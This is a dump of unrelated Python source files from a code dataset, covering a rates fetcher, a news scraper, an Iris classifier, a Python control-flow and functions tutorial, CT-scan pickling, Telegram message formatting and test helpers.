    def process_view(self, request, view_func, view_args, view_kwarg):
        """Block the admin namespace and admin login page for non-staff users."""
        if request.user is not None:
            if request.resolver_match.namespace == 'admin' or \
                    request.path_info.startswith('/selling-online-overseas/admin/login'):
                # Authenticated but not staff -> explain the SSO onboarding step.
                if not request.user.is_staff and request.user.is_authenticated:
                    return HttpResponse(self.SSO_UNAUTHORISED_ACCESS_MESSAGE, status=401)
| StarcoderdataPython |
4881542 | <gh_stars>0
""" main module """
from concurrent.futures import ThreadPoolExecutor
from datetime import date
from requests import request
import time
import threading
from rates_demo.business_days import business_days
def get_rates() -> None:
    """Fetch USD->EUR rates for every business day in Q1 2021, sequentially."""
    start_date = date(2021, 1, 1)
    end_date = date(2021, 3, 31)

    rate_responses: list[str] = []
    for business_day in business_days(start_date, end_date):
        rate_url = f"http://127.0.0.1:5000/api/{business_day}?base=USD&symbols=EUR"
        rate_responses.append(request("GET", rate_url).text)

    print(f"num of responses: {len(rate_responses)}")
    print(rate_responses)
def get_rate_task(business_day: date, responses: list[str]) -> None:
    """Fetch one day's USD->EUR rate and append the raw body to *responses*."""
    url = f"http://127.0.0.1:5000/api/{business_day}?base=USD&symbols=EUR"
    responses.append(request("GET", url).text)
def get_rates_threaded() -> None:
    """Fetch Q1-2021 USD->EUR rates concurrently, one thread per business day."""
    start_date = date(2021, 1, 1)
    end_date = date(2021, 3, 31)

    rate_responses: list[str] = []
    workers = [
        threading.Thread(target=get_rate_task, args=(day, rate_responses))
        for day in business_days(start_date, end_date)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()

    print(f"num of responses: {len(rate_responses)}")
    print(rate_responses)
# threadpool version
# def get_rates_threaded() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# rate_responses = list(executor.map(
# get_rate_task,
# [ business_day for business_day
# in business_days(start_date, end_date) ]))
# print(f"num of responses: {len(rate_responses)}")
# print(rate_responses)
# def get_rates_threaded_gen() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# executor.map(
# lambda params: get_rate_task(*params),
# ( (business_day, rate_responses) for business_day
# in business_days(start_date, end_date) ))
# print(f"num of responses: {len(rate_responses)}")
# if __name__ == "__main__":
# start = time.time()
# get_rates()
# print(f"original time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded()
# print(f"threaded time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded_gen()
# print(f"threaded time elapsed: {time.time() - start}")
| StarcoderdataPython |
3585952 | <filename>scrapper.py<gh_stars>0
"""
Scrapper implementation
"""
from datetime import datetime
import json
import shutil
from bs4 import BeautifulSoup
import requests
from constants import ASSETS_PATH, CRAWLER_CONFIG_PATH
from core_utils.article import Article
class IncorrectURLError(Exception):
    """
    Seed URL does not match standard pattern (missing, not a list,
    or lacking an http(s) scheme)
    """
class NumberOfArticlesOutOfRangeError(Exception):
    """
    Total number of articles to parse is too big (above 200)
    """
class IncorrectNumberOfArticlesError(Exception):
    """
    Total number of articles to parse is not a positive integer
    """
class Crawler:
    """
    Crawler implementation: harvests article URLs from magadanpravda.ru
    seed pages up to a configured maximum
    """
    def __init__(self, seed_urls, max_articles: int):
        self.seed_urls = seed_urls
        self.max_articles = max_articles
        # Collected absolute article URLs, capped at max_articles.
        self.urls = []
    def _extract_url(self, article_bs):
        # hrefs on the site appear to be relative, so the domain is prefixed.
        # NOTE(review): this yields a double slash if href already starts
        # with '/' - confirm against the live markup.
        self.urls.append('https://magadanpravda.ru/' + article_bs.find('a')['href'])
    def find_articles(self):
        """
        Finds articles: walks each seed page and harvests links from the
        headline <h3> elements until max_articles URLs are collected
        """
        for urls in self.seed_urls:
            response = requests.get(urls)
            # The site serves Cyrillic text; force utf-8 decoding.
            response.encoding = 'utf-8'
            page_bs = BeautifulSoup(response.text, features='html.parser')
            class_bs = page_bs.find_all('h3', class_='el-title uk-h4 uk-margin-top uk-margin-remove-bottom')
            for article_bs in class_bs:
                if len(self.urls) < self.max_articles:
                    self._extract_url(article_bs)
    def get_search_urls(self):
        """
        Returns seed_urls param
        """
        return self.seed_urls
class HTMLParser:
    """Downloads one article page and extracts its text and metadata."""
    def __init__(self, article_url, article_id):
        self.article_url = article_url
        self.article_id = article_id
        self.article = Article(article_url, article_id)
    def _fill_article_with_text(self, article_bs):
        # The article body lives in the main content <div>.
        text_bs = article_bs.find('div', class_='el-content uk-panel uk-margin-top')
        self.article.text = text_bs.text
    def _fill_article_with_meta_information(self, article_bs):
        """Extract title, date, topics and author from the parsed page."""
        title_bs = article_bs.find('h2', class_='el-title uk-font-tertiary uk-margin-top uk-margin-remove-bottom').text
        self.article.title = title_bs
        date_bs = article_bs.find('div', class_='el-meta uk-text-meta uk-margin-top').text
        # Map Russian genitive month names to numbers so strptime can parse.
        months = {
            'января':'01',
            'февраля':'02',
            'марта':'03',
            'апреля':'04',
            'мая':'05',
            'июня':'06',
            'июля':'07',
            'августа':'08',
            'сентября':'09',
            'октября':'10',
            'ноября':'11',
            'декабря':'12'
        }
        for key, value in months.items():
            date_bs = date_bs.replace(key, value)
        # After substitution the string matches e.g. "05 03 2022 | 14:30".
        date = datetime.strptime(date_bs, "%d %m %Y | %H:%M")
        self.article.date = date
        topic = article_bs.find_all('span', class_='uk-text-middle')
        for hashtags in topic:
            self.article.topics.append(hashtags.text)
        # The site exposes no author field.
        self.article.author = 'NOT FOUND'
    def parse(self):
        """Fetch the article page and return the populated Article."""
        response = requests.get(self.article_url)
        # NOTE(review): unlike Crawler.find_articles, response.encoding is not
        # forced to utf-8 here - confirm requests detects it correctly.
        article_bs = BeautifulSoup(response.text, 'html.parser')
        self._fill_article_with_text(article_bs)
        self._fill_article_with_meta_information(article_bs)
        return self.article
def prepare_environment(base_path):
    """
    Creates ASSETS_PATH folder if not created and removes existing folder
    """
    # Wipe any previous run's output, then start with a fresh directory tree.
    if base_path.exists():
        shutil.rmtree(base_path)
    base_path.mkdir(parents=True)
def validate_config(crawler_path):
    """
    Validates given config.

    Reads the JSON config at *crawler_path* and returns
    (seed_urls, max_articles) after checking types, bounds and URL schemes.

    Raises:
        IncorrectNumberOfArticlesError: count is not a positive integer.
        NumberOfArticlesOutOfRangeError: count exceeds 200.
        IncorrectURLError: seed URLs missing, not a list, or not http(s).
    """
    with open(crawler_path, 'r', encoding='utf-8') as file:
        config = json.load(file)

    seed_urls = config['seed_urls']
    max_articles = config['total_articles_to_find_and_parse']

    # bool is a subclass of int, so exclude it explicitly.
    if isinstance(max_articles, bool) or not isinstance(max_articles, int):
        raise IncorrectNumberOfArticlesError
    if max_articles <= 0:
        raise IncorrectNumberOfArticlesError
    if not isinstance(seed_urls, list) or not seed_urls:
        raise IncorrectURLError
    if max_articles > 200:
        raise NumberOfArticlesOutOfRangeError
    for url in seed_urls:
        # startswith with a tuple replaces the original manual slice checks.
        if not isinstance(url, str) or not url.startswith(('https://', 'http://')):
            raise IncorrectURLError
    return seed_urls, max_articles
if __name__ == '__main__':
    # Validate config, reset the assets folder, crawl seed pages, then
    # download and persist each article's raw text and metadata.
    sites, articles = validate_config(CRAWLER_CONFIG_PATH)
    prepare_environment(ASSETS_PATH)
    crawler = Crawler(sites, articles)
    crawler.find_articles()
    A_ID = 1
    for article_url_new in crawler.urls:
        parsing_article = HTMLParser(article_url_new, A_ID)
        parsed_article = parsing_article.parse()
        parsed_article.save_raw()
        A_ID += 1
| StarcoderdataPython |
8059745 | <reponame>pranavj1001/MachineLearningRecipes<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 25 23:50:01 2017
@author: pranavjain
This model classifies the flower species using Naive Bayes.
Required Data to predict SepalLength in cm, SepalWidth in cm, PetalLength in cm, PetalWidth in cm.
"""
# import libraries
import numpy as np
import pandas as pd
# get data from the dataset
dataset = pd.read_csv('Iris.csv')
X = dataset.iloc[:, [1,2,3,4]].values
y = dataset.iloc[:, 5].values
# do this for labelEncoding since it is deprecated to directly use 1d arrays
y.reshape(-1,1)
# Label Encode the y set
# Iris-setosa -> 0
# Iris-versicolor -> 1
# Iris-virginica -> 2
from sklearn.preprocessing import LabelEncoder
labelEncoder_y = LabelEncoder()
y = labelEncoder_y.fit_transform(y)
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting Naive Bayes to the Training set
from sklearn.naive_bayes import GaussianNB
classifier = GaussianNB()
classifier.fit(X_train, y_train)
# predict our test results
y_pred = classifier.predict(X_test)
# to calculate the number of results that we got wrong
# eg. here we predicted all correct
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# predict for custom values
# Arguments(SepalLength in cm, SepalWidth in cm, PetalLength in cm, PetalWidth in cm)
test = np.matrix('4 1 5 1')
test =sc.transform(test)
pred = classifier.predict(test)
| StarcoderdataPython |
172121 | # Chapter 4
# 60 sec/min * 60 min/hr * 24 hr/day
# seconds_per_day = 86400
seconds_per_day = 86400 # 60 sec/min * 60 min/hr * 24 hr/day
# Continue Lines with \
alphabet = 'abcdefg' + \
'hijklmnop' + \
'qrstuv' + \
'wxyz'
print(alphabet)
# Compare with if, elif, and else
disaster = True
if disaster:
print("Woe!")
else:
print("Whee!")
# Some examples about comparison
# make multiple comparisons and, or, not
x = 7
r = (5 < x) and (x < 10)
print(r)
r = (5 < x) and not (x > 10)
print(r)
# multiple comparisons with one variable
r = 5 < x < 10
print(r)
# longer comparisons
r = 5 < x < 10 < 5
print(r)
# Python use another ways to check for empty data structures
# No only use boolean values
# Considered an value "False"
# (null | None)
# (int | 0)
# (float | 0.0)
# (empty string | "")
# (empty list | [])
# (empty tuple | ())
# (empty dict | {})
# (empty set | set())
some_list = []
if some_list:
print("There's something in here")
else:
print("Hey, it's empty!")
# Do Multiple Comparisons with in
letter = 'o'
if letter == 'a' or letter == 'e' or letter == 'i' or letter == 'o' or letter == 'u':
print(letter, 'is a vowel')
else:
print(letter, 'is not a vowel')
# Check values using "in"
# string
vowels = "aeiou"
letter = 'o'
print(letter in vowels)
# Set
vowel_set = {'a', 'e', 'i', 'o', 'u'}
print(letter in vowel_set)
# list
vowel_list = ['a', 'e', 'i', 'o', 'u']
print(letter in vowel_set)
# tuple
vowel_tuple = ('a', 'e', 'i', 'o', 'u')
print(letter in vowel_tuple)
# dict
vowel_dict = {'a': 'apple', 'e': 'elephant','i': 'impala', 'o': 'ocelot', 'u': 'unicorn'}
print(letter in vowel_dict)
# Repeat with while
count = 1
while count <= 5:
print(count)
count += 1
# loop infinite with break statement
while True:
stuff = input("String to capitalize [type q to quit]: ")
if stuff == 'q':
break
print(stuff.capitalize())
# Skip Ahead with continue
while True:
value = input("Integer, [please type q to quit]: ")
if value == 'q':
break
number = int(value)
if number % 2 == 0:
continue
print(number, "squared is", number*number)
# Use break with else
numbers = [1, 5, 3]
position = 0
while position < len(numbers):
number = numbers[position]
if number % 2 == 0:
print("Found even number: ", number)
break
position += 1
else: # break not called
print('No even number found')
# For
rabbits = ['Flopsy', 'Mopsy', 'Cottontail', 'Peter']
current = 0
while current < len(rabbits):
print(rabbits[current])
current += 1
# Better
for rabbit in rabbits:
print(rabbit)
# dict
accusation = {'room': 'ballroom', 'weapon': 'lead pipe', 'person': '<NAME>'}
for card in accusation: # or, for card in accusation.keys():
print(card)
# Values
for value in accusation.values(): # or, for card in accusation.keys():
print(value)
# Item
for item in accusation.items(): # or, for card in accusation.keys():
print(item)
# zip() to pair tuples
english = 'Monday', 'Tuesday', 'Wednesday'
french = 'Lundi', 'Mardi', 'Mercredi'
lst = list(zip(english, french))
print(lst)
zip_dict = dict(zip(english, french))
print(zip_dict)
# Zip
days = ['Monday', 'Tuesday', 'Wednesday']
fruits = ['banana', 'orange', 'peach']
drinks = ['coffee', 'tea', 'beer']
desserts = ['tiramisu', 'ice cream', 'pie', 'pudding']
binary = ["True", "False", "Other"]
integer = [1, 0]
print(tuple(zip(integer, binary)))
new_dict = dict(zip(integer, binary))
print(new_dict[1])
for day, fruit, drink, dessert in zip(days, fruits, drinks, desserts):
print(day, ": drink", drink, "- eat", fruit, "- enjoy", dessert)
# Generate Number Sequences with range()
for item in range(0, 3):
print(item)
print(list(range(0, 3)))
# make a range from 2 down to 0
for item in range(2, -1, -1):
print(item)
# Comprehensions
# List Comprehensions
# create a list without using comprehension
number_list = list(range(1, 6))
print(number_list)
# create a list using comprehension
number_list = [number for number in range(1, 6) if number % 2 == 1]
print(number_list)
# Using comprehension to create cells
rows = range(1, 4)
cols = range(1, 3)
cells = [(row, col) for row in rows for col in cols]
for cell in cells:
print(cell)
# Dictionary Comprehensions
word = 'letters'
letters_count = {letter: word.count(letter) for letter in word}
print(letters_count)
# Now using set()
letters_count = {letter: word.count(letter) for letter in set(word)}
print(letters_count)
# Set Comprehensions
a_set = {number for number in range(1, 6) if number % 3 == 1}
print(a_set)
# Generator
number_thing = (number for number in range(1, 6))
print(type(number_thing))
number_list = list(number_thing)
print(number_list)
try_again = list(number_thing)
print(try_again)
# Functions
def agree():
return True
if agree():
print('Splendid!')
else:
print('That was unexpected.')
# Parameters
def echo(anything):
return print(anything + ' ' + anything)
echo('LAM')
# With parameters and arguments
def commentary(color):
    """Return a quip about the given color name."""
    known = {
        'red': "It's a tomato.",
        'green': "It's a green pepper.",
        'bee purple': "I don't know what it is, but only bees can see it.",
    }
    return known.get(color, "I've never heard of the color " + color + ".")
comment = commentary('blue')
print(comment)
# None value on functions
def do_something():
pass
print(do_something())
thing = None
if thing:
print("It's some thing")
else:
print("It's no thing")
# distinguish None from boolean False
if thing is None:
print("It's some thing")
else:
print("It's no thing")
def is_none(thing):
    """Print whether *thing* is None, truthy, or falsy (three distinct cases)."""
    if thing is None:
        print("It's None")
        return
    print("It's True" if thing else "It's False")
is_none(None)
is_none(True)
is_none(False)
# All of the following are falsy but not None:
is_none(0)
is_none(0.0)
is_none(())
is_none([])
is_none({})
is_none(set())
def menu(wine, entree, dessert):
    """Return the three courses as a dict."""
    return {'wine': wine, 'entree': entree, 'dessert': dessert}
print(menu('chardonnay', 'chicken', 'cake'))
# Using keyword arguments (order no longer matters)
print(menu(entree='beef', dessert='bagel', wine='bordeaux'))
# Specify Default Parameter Values
def menu(wine, entree, dessert='pudding'):
    """Return the three courses as a dict; dessert defaults to 'pudding'."""
    return {'wine': wine, 'entree': entree, 'dessert': dessert}
print(menu('chardonnay', 'chicken'))
# Important, Default argument values are calculated when the function is
# defined, not when it is run
def buggy(arg, result=[]):
    # Deliberately broken: the default list is created once at definition
    # time and shared across calls, so items accumulate.
    result.append(arg)
    print(result)
# In above function: there’s a bug: it’s empty only the first time it’s called. The second time, result
# still has one item from the previous call:
# (buggy() prints the list and returns None, so each call below also prints None)
print(buggy('a'))
print(buggy('b'))
# fixing last bug
def works(arg):
    """Return a fresh one-element list containing *arg* (no shared state)."""
    return [arg]
print(works('a'))
print(works('b'))
def non_buggy(arg, result=None):
    """Append *arg* to *result*, creating a fresh list per call when omitted."""
    if result is None:
        result = []
    result.append(arg)
    print(result)
print(non_buggy('a'))
# Gather positional arguments with *
def print_args(*args):
    """Print all positional arguments gathered into a tuple."""
    print('Positional argument tuple:', args)
print(print_args()) # also prints None: print_args() has no return value
print(print_args(3, 2, 1, 'wait!', 'uh...'))
# If your function has required positional arguments as well, *args goes at
# the end and grabs all the rest
# Gather Positional Arguments with *
def print_more(required1, required2, *args):
    """Print two required arguments, then any extras gathered by *args."""
    print('Need this one:', required1)
    print('Need this one too:', required2)
    print('All the rest:', args)
print_more('cap', 'gloves', 'scarf', 'monocle', 'mustache wax')
# Gather Keyword Arguments with **
def print_kwargs(**kwargs):
    """Print all keyword arguments gathered into a dict."""
    print('Keyword arguments:', kwargs)
print_kwargs(wine='merlot', entree='mutton', dessert='macaroon')
# Docstrings
# Functions Are First-Class Citizens
def add_args(arg1, arg2):
    """Print the sum of the two arguments (returns None)."""
    print(arg1 + arg2)
def run_something_with_args(func, arg1, arg2):
    """Call *func* with the two arguments; the result is discarded."""
    func(arg1, arg2)
print(run_something_with_args(add_args, 5, 4))
# another example with *arg and **kwarg
def sum_args(*args):
    """Return the sum of all positional arguments (0 when none are given)."""
    total = 0
    for value in args:
        total += value
    return total
def run_with_positional_args(func, *args):
    """Call *func* with the gathered positional arguments and return its result."""
    return func(*args)
print(run_with_positional_args(sum_args, 1, 2, 3, 4, 5))
# Closure functions examples
def parent_function(name):
    """Return a closure that remembers *name* from this enclosing scope."""
    def child_function():
        print("I am a child function called " + name)
    return child_function
closure = parent_function('Gio10')
print(closure)
print(type(closure))
closure()
# Anonymous Functions: the lambda() Function
def edit_story(words, func):
    """Apply *func* to each word and print the result."""
    for word in words:
        print(func(word))
stairs = ['thud', 'meow', 'thud', 'hiss']
def enliven(word): # give that prose more punch
    """Capitalize the word and append an exclamation mark."""
    return word.capitalize() + '!'
# edit_story(stairs, enliven)
edit_story(stairs, lambda arg: arg.capitalize() + '!')
def my_range(first=0, last=10, step=1):
    """Generator counting from first up to (exclusive) last by step.

    NOTE: each yielded value is doubled (number * 2), so despite the name
    this does not reproduce range()'s values.
    """
    number = first
    while number < last:
        yield number * 2
        number += step
ranger = my_range(1, 20)
print(ranger)
for item in ranger:
    print(item)
# Decorators
def document_it(func):
    """Decorator: log the name, arguments, and result of each call to *func*."""
    def new_function(*args, **kwargs):
        print('Running function:', func.__name__)
        print('Positional arguments:', args)
        print('Keyword arguments:', kwargs)
        result = func(*args, **kwargs)
        print('Result:', result)
        return result
    return new_function
# Another decorator
def square_it(func):
    """Decorator: square the result of *func*."""
    def new_function(*args, **kwargs):
        result = func(*args, **kwargs)
        return result * result
    return new_function
# Decorators apply bottom-up: document_it wraps add_ints first, then
# square_it squares the documented result (3 + 5 = 8 -> 64).
@square_it
@document_it
def add_ints(a, b):
    return a + b
print(add_ints(3, 5))
# Manual decorator (wraps the already-decorated add_ints one more time)
cooler_add_ints = document_it(add_ints)
cooler_add_ints(3, 5)
# No manual
print(add_ints(3, 5))
# Things to Do
# 4.4: list comprehension of 0..9
numbers = [number for number in range(10)]
print(numbers)
# 4.5: dict comprehension mapping each number to its square
squares = {number: number*number for number in range(10)}
print(squares)
# 4.6: set of the odd numbers below 10
odd_numbers = set(number for number in range(10) if number % 2 == 1)
print(odd_numbers)
# 4.7: iterate over a list comprehension of formatted strings
for item in ['Got %s' % num for num in range(10)]:
    print(item)
| StarcoderdataPython |
61558 | <reponame>twerkmeister/table-segmenter
import argparse
from typing import Text
import os
import table_segmenter.model
import table_segmenter.io
import table_segmenter.preprocessing
import table_segmenter.metrics
import tensorflow
from tensorflow import keras
def load_data_for_training(data_path: Text):
    """Load, preprocess, and augment images and targets from *data_path*.

    Returns a tuple (x_augmented, y) of model inputs and preprocessed targets.
    """
    image_names, images = table_segmenter.io.load_images(data_path)
    targets = table_segmenter.io.load_targets(data_path, image_names)
    # Keep the pre-preprocessing shapes: augmentation needs them to map
    # the targets onto the transformed images.
    original_image_shapes = [image.shape for image in images]
    x = table_segmenter.preprocessing.preprocess_images(images)
    x_augmented, augmented_targets = \
        table_segmenter.preprocessing.augment_multi(x, targets, original_image_shapes)
    y = table_segmenter.preprocessing.preprocess_targets(augmented_targets)
    return x_augmented, y
def train(train_data_path: Text, val_data_path: Text, experiment_dir: Text):
    """Train the table segmenter and save the model, logs, and metrics.

    Args:
        train_data_path: folder containing training images and targets.
        val_data_path: folder containing validation images and targets.
        experiment_dir: output folder for the saved model and TensorBoard logs.
    """
    tensorflow.compat.v1.disable_eager_execution()
    # tensorflow.config.run_functions_eagerly(True)
    os.makedirs(experiment_dir, exist_ok=True)
    tensorboard_callback = keras.callbacks.TensorBoard(log_dir=experiment_dir)
    # Stop once val_loss stops improving and roll back to the best weights.
    early_stopping_callback = keras.callbacks.EarlyStopping("val_loss", patience=7,
                                                            verbose=1,
                                                            restore_best_weights=True)
    print("Loading training data")
    x_train, y_train = load_data_for_training(train_data_path)
    print("Loading validation data")
    x_val, y_val = load_data_for_training(val_data_path)
    model = table_segmenter.model.build()
    model.compile(loss=table_segmenter.metrics.combined_loss,
                  optimizer='adam',
                  # run_eagerly=True,
                  metrics=[table_segmenter.metrics.regression_mean_absolute_error,
                           table_segmenter.metrics.decision_accuracy,
                           table_segmenter.metrics.regression_mean_error,
                           table_segmenter.metrics.regression_error_stddev])
    model.fit(x_train,
              y_train,
              validation_data=(x_val, y_val),
              epochs=80,
              batch_size=16,
              verbose=True,
              callbacks=[tensorboard_callback, early_stopping_callback])
    model.save(experiment_dir)
    # MAE evaluation: score[0] is the loss, score[1] the first compiled
    # metric (regression mean absolute error).
    score = model.evaluate(x_val,
                          y_val,
                          batch_size=16,
                          verbose=True)
    # Bug fix: the original string began with a literal "n" ("nTest MAE")
    # instead of the intended newline escape.
    print("\nTest MAE: %.1f%%" % (score[1]))
if __name__ == "__main__":
    # CLI entry point: train <train_data_path> <val_data_path> <experiment_folder>
    parser = argparse.ArgumentParser(description='train the table segmenter.')
    parser.add_argument("train_data_path",
                        help='Path to the training data folder.')
    parser.add_argument("val_data_path",
                        help='Path to the validation data folder.')
    parser.add_argument("experiment_folder",
                        help='Path to the output folder for the model and logs.')
    args = parser.parse_args()
    train(args.train_data_path, args.val_data_path, args.experiment_folder)
| StarcoderdataPython |
9624002 | <reponame>Den4200/pyfrost
import socket
from typing import Optional, Tuple
class UserObj:
    """A connected client and, once authenticated, its identity.

    :param addr: IP address and port of the connected user
    :type addr: Tuple[str, int]
    :param conn: socket instance of the connected user
    :type conn: 'socket.socket'
    :param id_: the user's ID, defaults to None
    :type id_: Optional[int]
    :param username: the user's username, defaults to None
    :type username: Optional[str]
    """

    def __init__(
        self,
        addr: Tuple[str, int],
        conn: 'socket.socket',
        id_: Optional[int] = None,
        username: Optional[str] = None
    ) -> None:
        """Store the connection details and the (optional) identity."""
        self.addr = addr
        self.conn = conn
        self.id = id_
        self.username = username

    @property
    def is_logged_in(self) -> bool:
        """True once both an ID and a username have been assigned.

        :rtype: bool
        """
        return not (self.id is None or self.username is None)

    def login(self, id_: int, username: str) -> None:
        """Record the user's ID and username, marking them as logged in.

        :param id_: the user's ID
        :type id_: int
        :param username: the user's username
        :type username: str
        """
        self.id = id_
        self.username = username
class Memory:
    """Process-wide registry of connection state, shared across handlers."""

    # Every connected user.
    all_users = {}

    # The subset of connected users that have logged in.
    logged_in_users = {}
| StarcoderdataPython |
1784214 | <filename>preprocess_ct_scans.py
import os
import pydicom
import joblib
import dicom_numpy
from fastai.medical.imaging import get_dicom_files
from preprocess_volumes import CleanCTScans
from joblib import Parallel, delayed
def get_ct_scan_as_list_of_pydicoms(folder, destination_folder):
    """Read every DICOM slice in *folder*, sort by slice position, and pickle it.

    The pickle is named after the scan's PatientID and written into
    *destination_folder*. Returns a short status message.
    """
    slices = [pydicom.dcmread(path) for path in get_dicom_files(folder)]
    slices = dicom_numpy.sort_by_slice_position(slices)
    file_path = f"{destination_folder}/{slices[0].PatientID}.pkl"
    joblib.dump(slices, file_path)
    return f'Saved file - {file_path}'
def save_each_scan_as_pickle(source_folder, destination_folder):
    """Pickle every scan found in *source_folder* into *destination_folder*.

    Each non-hidden entry of *source_folder* is treated as one scan folder
    and processed in parallel with joblib.
    """
    if not os.path.isdir(destination_folder):
        os.makedirs(destination_folder)
    # NOTE(review): os.listdir also returns plain files; presumably the
    # source folder contains only scan sub-folders — confirm.
    folders = [os.path.join(source_folder, folder) for folder in os.listdir(source_folder) if
               not folder.startswith('.')]
    # NOTE(review): max(10, len(folders)) launches at least 10 workers even
    # for a handful of folders — min() may have been intended; confirm.
    results = Parallel(n_jobs=max(10,len(folders)))(delayed(get_ct_scan_as_list_of_pydicoms)(im_file, destination_folder)
                                                    for im_file in folders)
    print(*results, sep='\n')
    print(len(folders))
# Script driver: pickle both tampered-scan sets (earlier runs kept commented
# out), then clean the training pickles.
source = "../data/Tampered_Scans/Experiment-2-Open/"
destination = './pickled_scans/test'
# save_each_scan_as_pickle(source, destination)
source = "../data/Tampered_Scans/Experiment-1-Blind/"
destination = './pickled_scans/train'
# save_each_scan_as_pickle(source, destination)
cleaner = CleanCTScans("run", "", "", "logs", "./pickled_scans/train", "../cleaned_scans")
| StarcoderdataPython |
42025 | <filename>programa idade/ex002.py
def idade_pessoa(id):
idp = int(id)
if idp <0:
return 'idade inválida'
elif idp <12:
return 'você ainda é uma criança'
elif idp <18:
return 'você é adolecente'
elif idp <65:
return 'Você já é adulto'
elif idp <100:
return 'você está na melhor idade'
else:
return 'você é uma pessoa centenária'
| StarcoderdataPython |
4994499 | <reponame>smoorjani/Diabetes-Classifer
import pandas as pd
import numpy as np
# Load the 8 feature columns of the diabetes dataset (label column excluded).
df = pd.read_csv('diabetes.csv',usecols=[i for i in range(8)])
from sklearn.preprocessing import StandardScaler
# Standardize each feature to zero mean / unit variance.
scaler = StandardScaler()
scaler.fit(df)
scaled = scaler.transform(df)
df_columns = df.columns[:8]
scaled_df = pd.DataFrame(scaled,columns=df_columns)
from sklearn.decomposition import PCA
from sklearn import preprocessing
# NOTE(review): this re-scales the already-standardized data *transposed*
# (features as rows), so the PCA below runs over features rather than
# samples — confirm this is intended.
scaled_df = preprocessing.scale(scaled_df.T)
pca = PCA()
pca.fit(scaled_df)
pca_df = pca.transform(scaled_df)
percentage_variation = np.round(pca.explained_variance_ratio_*100,decimals = 2)
labels = df.columns
import seaborn as sns
import matplotlib.pyplot as plt
# Scree plot: percentage of variance explained by each principal component.
ax = sns.barplot(x=list(range(1,len(percentage_variation)+1)),y=percentage_variation)
ax.set_xticklabels(labels,rotation=90)
#plt.bar(x=range(1,len(percentage_variation)+1),height=percentage_variation,tick_label=labels)
plt.xlabel('Principal Components')
plt.ylabel('Percentage of Explained Variance')
plt.title('Scree Plot of PCA on our Dataset')
plt.tight_layout()
plt.savefig('pca.png')
print(labels)
PCA_labels = ['PC'+str(x) for x in range(1,len(percentage_variation)+1)]
pca_dfa = pd.DataFrame(pca_df,index=labels,columns=PCA_labels)
# Scatter of the first two components, annotated with feature names.
plt.scatter(pca_dfa.PC1,pca_dfa.PC2)
plt.title('Correlation in Data based on PCA')
plt.xlabel('PC1 - {0}%'.format(percentage_variation[0]))
plt.ylabel('PC2 - {0}%'.format(percentage_variation[1]))
for val in pca_dfa.index:
    plt.annotate(val,(pca_dfa.PC1.loc[val],pca_dfa.PC2.loc[val]))
plt.show()
| StarcoderdataPython |
1887981 | def _apply_entities(text, entities, escape_map, format_map):
# Split string into char sequence and escape in-place to
# preserve index positions.
seq = list(map(lambda c, i:
escape_map[c] # escape special characters
if c in escape_map
else c,
list(text), # split string to char sequence
range(0, len(text)))) # along with each char's index
# Ensure smaller offsets come first
sorted_entities = sorted(entities, key=lambda e: e['offset'])
offset = 0
result = ''
for e in sorted_entities:
f, n, t = e['offset'], e['length'], e['type']
result += ''.join(seq[offset:f])
if t in format_map:
# apply format
result += format_map[t](''.join(seq[f:f + n]), e)
else:
result += ''.join(seq[f:f + n])
offset = f + n
result += ''.join(seq[offset:])
return result
def apply_entities_as_markdown(text, entities):
    """
    Format text as Markdown, escaping special characters along the way.
    The returned value can be passed to :meth:`.Bot.sendMessage` with the
    appropriate ``parse_mode``.

    :param text:
        plain text
    :param entities:
        a list of `MessageEntity <https://core.telegram.org/bots/api#messageentity>`_ objects
    """
    # Every Markdown metacharacter is escaped with a single backslash.
    escapes = {ch: '\\' + ch for ch in "*_[]`()~>#+-=|{}.!"}
    formatters = {
        'bold': lambda s, e: f'*{s}*',
        'italic': lambda s, e: f'_{s}_',
        'text_link': lambda s, e: f'[{s}]({e["url"]})',
        'text_mention': lambda s, e: f'[{s}](tg://user?id={e["user"]["id"]})',
        'code': lambda s, e: f'`{s}`',
        'pre': lambda s, e: f'```text\n{s}```',
        'underline': lambda s, e: f'__{s}__',
        'strikethrough': lambda s, e: f'~{s}~'
    }
    return _apply_entities(text, entities, escapes, formatters)
def apply_entities_as_html(text, entities):
    """
    Format text as HTML, escaping special characters along the way.
    The returned value can be passed to :meth:`.Bot.sendMessage` with the
    appropriate ``parse_mode``.

    :param text:
        plain text
    :param entities:
        a list of `MessageEntity <https://core.telegram.org/bots/api#messageentity>`_ objects
    """
    escapes = {'<': '&lt;',
               '>': '&gt;',
               '&': '&amp;', }

    def tag(name):
        # Build a formatter that wraps the span in <name>...</name>.
        return lambda s, e: f'<{name}>{s}</{name}>'

    formatters = {
        'bold': tag('b'),
        'italic': tag('i'),
        'text_link': lambda s, e: f'<a href="{e["url"]}">{s}</a>',
        'text_mention': lambda s, e: f'<a href="tg://user?id={e["user"]["id"]}">{s}</a>',
        'code': tag('code'),
        'pre': tag('pre'),
        'underline': tag('u'),
        'strikethrough': tag('s')
    }
    return _apply_entities(text, entities, escapes, formatters)
| StarcoderdataPython |
8179953 | from pathlib import Path
import pytest # type: ignore
from ape import Project, networks
from ape_http.providers import EthereumNetworkConfig
from ape_hardhat import HardhatProvider
def get_project():
    """Load the ape Project rooted at this test directory."""
    return Project(Path(__file__).parent)
def get_network_config():
    """Build a fresh hardhat plugin config with test-friendly retry settings."""
    p = get_project()
    config_classes = [
        klass for (name, klass) in p.config.plugin_manager.config_class if name == "hardhat"
    ]
    assert len(config_classes) == 1
    config = config_classes[0]()
    # need to instantiate a new instance of this otherwise it's shared across HH instances
    config.ethereum = EthereumNetworkConfig()
